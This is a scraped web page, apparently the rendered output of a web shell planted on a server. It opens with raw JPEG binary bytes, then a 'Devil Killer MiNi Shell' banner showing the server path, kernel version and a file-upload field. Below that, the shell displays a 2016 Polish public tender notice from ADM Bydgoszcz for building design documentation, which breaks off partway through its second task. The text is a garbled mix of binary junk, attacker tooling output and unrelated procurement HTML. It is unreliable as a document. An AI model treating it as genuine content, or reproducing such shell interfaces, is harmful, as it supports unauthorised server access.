JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/125721-N-2016.html

<p class="kh_header"><b>Bydgoszcz: 103/P/2016</b><br>
<b>Numer ogłoszenia: 125721 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spólka prawa handlowego - pełnomocnik Miasta Bydgoszcz.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 103/P/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji  projektowych  na wykonanie robót budowlanych w budynkach gminnych - zarządzanych przez Administrację Domów Miejskich  ADM Sp. z o. o. w Bydgoszczy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż                w okresie ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował należycie zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj. wykonał:
warunek dla zadania nr 1 i 2:
*projekt budowlany dotyczący budowy lub przebudowy budynku wraz z pomieszczeniami higieniczno-sanitarnymi  
lub  
* projekt budowlany dotyczący zmiany sposobu użytkowania budynku lub jego części w zakresie wydzielenia pomieszczenia  higieniczno-sanitarnego
warunek  dla zadania nr 3:
* projekt budowlany dotyczący budowy/modernizacji/wymiany wewnętrznej instalacji gazowej lub instalacji  centralnego ogrzewania gazowego
warunek  dla zadania nr 4:
*  projekt  budowlany  dotyczący budowy obiektu budowlanego  (np.  wiaty  śmietnikowej )
warunek  dla zadania nr 5:
*  projekt  budowlany  dotyczący podłączenia budynku do miejskiej sieci kanalizacyjnej (wykonania przyłącza kanalizacji sanitarnej)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje minimum:

warunek dla zadania nr 1 i nr 2:
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych - zgodnie z ustawą  z dnia 7 lipca 1994 Prawo budowlane lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej zgodnie z ustawą z dnia 7 lipca 1994 Prawo budowlane lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych zgodnie z ustawą z dnia 7 lipca 1994 Prawo budowlane lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, oraz aktualne zaświadczenie o wpisie na listę członków właściwej  Izby Inżynierów Budownictwa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności architektonicznej zgodnie z ustawą z dnia 7 lipca 1994 Prawo budowlane lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa oraz aktualne zaświadczenie o przynależności do właściwej Izby Inżynierów Budownictwa
warunek  dla zadania nr 3 :
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej  w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych i gazowych - zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących przepisów prawa, oraz aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
warunek dla zadania nr 4:
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
warunek dla zadania nr 5:
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń kanalizacyjnych  zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa
* osobą posiadającą uprawnienia budowlane do projektowania w specjalności inżynieryjnej drogowej  zgodnie   z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U. 2013r., poz. 1409 ze zm.) lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, posiadającą aktualne zaświadczenie o wpisie na listę członków właściwej Izby Inżynierów Budownictwa

UWAGA:
W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do ww. zdobyte                     w innych państwach,  na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994 r.  Prawo budowla</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>warunek dla zadania nr 1 i 2:
*projekt budowlany dotyczący budowy lub przebudowy budynku wraz z pomieszczeniami higieniczno-sanitarnymi  
lub  
* projekt budowlany dotyczący zmiany sposobu użytkowania budynku lub jego części w zakresie wydzielenia pomieszczenia  higieniczno-sanitarnego
warunek  dla zadania nr 3:
* projekt budowlany dotyczący budowy/modernizacji/wymiany wewnętrznej instalacji gazowej lub instalacji  centralnego ogrzewania gazowego
warunek  dla zadania nr 4:
*  projekt  budowlany  dotyczący budowy obiektu budowlanego  (np.  wiaty  śmietnikowej )
warunek  dla zadania nr 5:
*  projekt  budowlany  dotyczący podłączenia budynku do miejskiej sieci kanalizacyjnej (wykonania przyłącza kanalizacji sanitarnej);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawca  zobowiązany jest złożyć wraz z OFERTĄ następujące  dokumenty :
1. w przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału w postępowaniu polega na zasobach innych podmiotów - pisemne zobowiązanie (oświadczenie) innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia (złożone w  oryginale).
Powyższe zobowiązanie winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu - wskazywać jego rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu.  W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia (tj. wiedza i doświadczenie, potencjał osobowy)- taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. 
2.  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo                o którym mowa w pkt.7.5. ust.1) niniejszej SIWZ (złożone w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii )
3. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo do reprezentowania wykonawcy przez Pełnomocnika (w oryginale lub notarialnie poświadczonej za zgodność z oryginałem kopii)

4.  Podmioty wspólnie ubiegające się o udzielenie zamówienia:
- zgodnie z art.23 uPzp Zamawiający dopuszcza możliwość składania jednej oferty przez dwa lub więcej podmioty/ów jednak pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1) wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy - wówczas do oferty należy dołączyć pełnomocnictwo, z którego wynikać będzie zakres umocowania.
2) każdy z wykonawców musi oddzielnie udokumentować - przedkładając dokumenty, o których mowa             w pkt.7.2. SIWZ, że nie podlega wykluczeniu na podstawie  art.24 ust.1. ustawy Pzp oraz  złożyć listę kapitałową  albo informację  o tym, że nie należy do grupy kapitałowej,o której mowa w pkt.7.3. SIWZ
3) wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni łącznie spełniać warunki udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy Pzp, a określone przez Zamawiającego w  pkt.6.2. SIWZ
4) oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie,
5) jeżeli oferta wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający przed zawarciem umowy może zażądać przedłożenia umowy regulującej współpracę wykonawców
5. Formularz oferty - zgodny ze wzorem stanowiącym załącznik nr 1 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania dokumentacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja  Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9  (2 piętro, pokój 2).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 11:00, miejsce: Administracja  Domów Miejskich ADM Sp. z o.o. 
         	Dział  Zamówień Publicznych  
          	85-005 Bydgoszcz  ul. Gdańska 9  (2 piętro, pokój 2).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1:  
polega na opracowaniu dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją na                   wydzielenie pomieszczenia WC/łazienki w obrębie lokali mieszkalnych nr 1 i nr 4 usytuowanych                  w budynku przy ul. Kaplicznej 15 wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych  dokumentacją.

Zakres dokumentacji projektowej winien obejmować  (odrębnie dla każdego lokalu)  m. in.: 
1)  prace w branży budowlanej:
- sporządzenie inwentaryzacji lokali nr 1 i nr 4
- zaprojektowanie wygrodzenia pomieszczenia sanitarnego lekką ścianką g-k
- wykonanie izolacji przeciwwilgociowej ścian i sufitów w pomieszczeniach sanitarnych
- ułożenie terakoty na podłodze i glazury na ścianach - do wysokości  2,0 m oraz niezbędne prace malarskie
- montaż stolarki drzwiowej
- zaprojektowanie wykonania prawidłowej wentylacji pomieszczenia sanitarnego, z uzyskaniem opinii kominiarskiej przez projektanta na podstawie której zostanie zaprojektowana wentylacja pomieszczeń sanitarnych
2) prace w branży sanitarnej:
- wykonanie nowej instalacji wod-kan z uwzględnieniem prawidłowego podłączenia do kanalizacji sanitarnej wraz z  opomiarowaniem
- wyposażenie lokali w urządzenia sanitarne wraz z wykonaniem podłączeń wod.-kan.
- wyposażenie łazienek w bojlery elektryczne podające ciepłą wodę do łazienki oraz kuchni
3) prace w branży elektrycznej:
- dostosowanie instalacji elektrycznej  w lokalach do nowej  funkcji pomieszczeń
Szczegółowy zakres  zamówienia obejmuje:
1) opracowanie inwentaryzacji budowlanej, na podstawie której należy zaprojektować wykonanie pomieszczenia WC/łazienki (z wyposażeniem) w obrębie lokalu mieszkalnego, z odprowadzeniem ścieków do istniejącej kanalizacji.
2) wykonanie dokumentacji (wielobranżowy projekt budowlany) uwzględniającej wszystkie roboty towarzyszące, zawierające opinie, uzgodnienia, pozwolenia i inne dokumenty wymagane przepisami szczegółowymi,
a) projekt budowlany winien być sporządzony w wersji papierowej - 5 egzemplarzy oraz zapisany                    na nośniku elektronicznym (płyta CD/DVD) w ilości 1 szt. i zawierać warunki BIOZ, wytyczne BHP i p. poż. 
b)  dokumentacja kosztorysowa  winna zawierać: 
- kosztorys inwestorski:  wersja papierowa - 2 egz., na nośniku elektronicznym - płyta  CD/DVD, 1 egz., kosztorys należy podzielić na poszczególne rodzaje robót (branże) oraz osobno dla każdego lokalu (pliki   dostarczyć w rozszerzeniu pdf i ath. )
- przedmiar robót (wersja papierowa: 2 egz., na nośniku elektronicznym: płyta CD/DVD, 1 egz.,                       z  podziałem na części tak jak kosztorys inwestorski)  oraz osobno dla każdego lokalu (pliki  dostarczyć                  w rozszerzeniu pdf i ath. )
c) szczegółowa specyfikacja techniczna wykonania i odbioru robót winna być sporządzona w wersji papierowej - 2 egzemplarze oraz  zapisana na nośniku elektronicznym -  płyta  CD/DVD, 1 egz.,
2) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) i zebranie wszystkich niezbędnych uzgodnień, pozwoleń, opinii (w tym miejskiego Konserwatora Zabytków jeśli zachodzi taka potrzeba) itp. dokumentów do opracowania  dokumentacji projektowej oraz  do  uzyskania  decyzji  pozwolenia na wykonanie robót budowlanych.
3) uzyskanie (na podstawie przygotowanego przez Wykonawcę pełnomocnictwa Zamawiającego) decyzji              pozwolenia na wykonanie robót objętych projektem. Wniosek należy złożyć do Wydziału Administracji Budowlanej Urzędu Miasta Bydgoszczy (wzór wniosku oraz karta usługi wydawania decyzji udzielającej pozwolenia na wykonanie robót jest na stronie UM Bydgoszcz, Wydział Administracji Budowlanej, Referat Architektury).
1. Termin wykonania i dostarczenia Zamawiającemu dokumentacji projektowo-kosztorysowej:zadanie nr 1:  60 dni od daty podpisania umowy przez Wykonawcę.
. Zamawiający w terminie 7 dni (roboczych) od daty otrzymania dokumentacji zobowiązany jest do wniesienia ewentualnych uwag bądź akceptacji dokumentacji projektowej.
3. Wykonawca w terminie 7 dni od daty otrzymania uwag od Zamawiającego - zobowiązany jest przekazać dokumentację zweryfikowaną w zakresie zgłoszonych przez Zamawiającego uwag. Zamawiający dokonuje przeglądu tak zweryfikowanej dokumentacji przy odpowiednim zastosowaniu ust.2.
4. Wykonawca niezwłocznie - lecz nie dłużej niż w terminie 3 dni (roboczych) - od daty akceptacji dokumentacji przez Zamawiającego, co zostanie potwierdzone spisanym przez strony protokołem, zobowiązany jest złożyć do WAB-u wniosek o wydanie decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową.
5.  Wykonawca zobowiązany w terminie 3 dni  od  daty uzyskania decyzji pozwolenia na wykonanie robót objętych dokumentacją projektową - dostarczyć  Zamawiającemu kopię tej decyzji.
6. Strony przewidują, że decyzja pozwolenia na wykonanie robót objętych dokumentacją projektową zostanie dostarczona Zamawiającemu przez Wykonawcę w terminie 90 dni od upływu terminu wyznaczonego na wykonanie dokumentacji projektowo-kosztorysowej, o którym mowa w pkt.1. 
7.  Wykonawca zobowiązany jest w trakcie realizacji zamówienia - do niezwłocznego - w ciągu 3 dni                     od dnia powzięcia informacji, przedkładania w formie pisemnej lub elektronicznej Zamawiającemu (osobie wskazanej  w umowie)  następujących dokumentów:
1)  kopii złożonego do WAB-u wniosku o wydanie decyzji pozwolenia na wykonanie robót z pieczątką jego wpływu do tego organu,
2)  kopii zawiadomienia o wszczęciu postępowania przez WAB UM niezwłocznie po jego otrzymaniu,                  
3) kopii otrzymanego postanowienia dotyczącego postępowania administracyjnego prowadzonego przez WAB niezwłocznie po jego otrzymaniu,
4) kopii potwierdzającej usunięcie nieprawidłowości lub braków wyszczególnionych w postanowieniu -  z data ich usunięcia,  
5) kopii wystąpienia do WAB-u o zawieszenie postępowania (z datą wpływu do tego organu) wraz z pisemnym wyjaśnieniem dla Zamawiającego o powodach zawieszenia,
6)  kopii decyzji pozwolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.25.00.00-5, 71.30.00.00-1, 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania dokumentacji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: 
polega na opracowaniu dokumentacji projektowo-kosztorysowej zwanej dalej dokumentacją na wydzielenie pomieszczeń WC w obrębie lokali mieszkalnych nr 15, 18, 20, 21 w budynku przy ul. Jasnej 25               (oficyna III) wraz z uzyskaniem przez Wykonawcę decyzji pozwolenia na wykonanie robót objętych              dokumentacją.
Zakres dokumentacji projektowej winien obejmować (odrębnie dla każdego lokalu) m. in.: 
1)  prace w branży budowlanej:
-  sporządzenie inwentaryzacji architektonicznej w zakresie niezbędnym dla celów projektowych
-  zaprojektowanie wygrodzenia pomieszczenia sanitarnego lekką ścianką g-k
